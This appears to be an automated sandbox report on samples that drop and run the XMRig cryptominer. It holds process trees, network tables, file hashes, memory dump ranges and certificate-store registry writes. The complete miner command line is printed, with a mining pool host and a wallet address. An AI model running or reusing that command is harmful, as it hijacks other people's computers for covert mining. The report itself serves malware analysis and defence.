Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3380 wrote to memory of 3500 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3380 wrote to memory of 3500 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3500-16-0x00000183696B0000-0x00000183696D0000-memory.dmp
memory/3500-17-0x0000018369910000-0x0000018369930000-memory.dmp
memory/3500-18-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-19-0x00000183FDA90000-0x00000183FDAB0000-memory.dmp
memory/3500-20-0x00000183FD860000-0x00000183FD880000-memory.dmp
memory/3500-21-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-22-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-23-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-25-0x00000183FD860000-0x00000183FD880000-memory.dmp
memory/3500-24-0x00000183FDA90000-0x00000183FDAB0000-memory.dmp
memory/3500-26-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-27-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-28-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-29-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-30-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-31-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-32-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-33-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-34-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-35-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-36-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-37-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-38-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-39-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-40-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-41-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-42-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-43-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-44-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-45-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-46-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-47-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-48-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-49-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-50-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-51-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-52-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-53-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-54-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-55-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-56-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-57-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-58-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-59-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-60-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-61-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-62-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-63-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-64-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-65-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-66-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-67-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-68-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-69-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-70-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-71-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-72-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-73-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-74-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-75-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-76-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-77-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-78-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-79-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-80-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-81-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-82-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-83-0x00007FF778420000-0x00007FF778F23000-memory.dmp
memory/3500-84-0x00007FF778420000-0x00007FF778F23000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:02
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3912 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3912 wrote to memory of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1668-16-0x000001C7EA6A0000-0x000001C7EA6C0000-memory.dmp
memory/1668-17-0x000001C7EA6F0000-0x000001C7EA710000-memory.dmp
memory/1668-18-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-19-0x000001C7EA730000-0x000001C7EA750000-memory.dmp
memory/1668-20-0x000001C7EA710000-0x000001C7EA730000-memory.dmp
memory/1668-21-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-22-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-25-0x000001C7EA710000-0x000001C7EA730000-memory.dmp
memory/1668-24-0x000001C7EA730000-0x000001C7EA750000-memory.dmp
memory/1668-23-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-26-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-27-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-28-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-29-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-30-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-31-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-32-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-33-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-34-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-35-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-36-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-37-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-38-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-39-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-40-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-41-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-42-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-43-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-44-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-45-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-46-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-47-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-48-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-49-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-50-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-51-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-52-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-53-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-54-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-55-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-56-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-57-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-58-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-59-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-60-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-61-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-62-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-63-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-64-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-65-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-66-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-67-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-68-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-69-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-70-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-71-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-72-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-73-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-74-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-75-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-76-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-77-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-78-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-79-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-80-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-81-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-82-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-83-0x00007FF762C30000-0x00007FF763733000-memory.dmp
memory/1668-84-0x00007FF762C30000-0x00007FF763733000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 19:51
Platform
win10v2004-20240226-en
Max time kernel
1798s
Max time network
1814s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
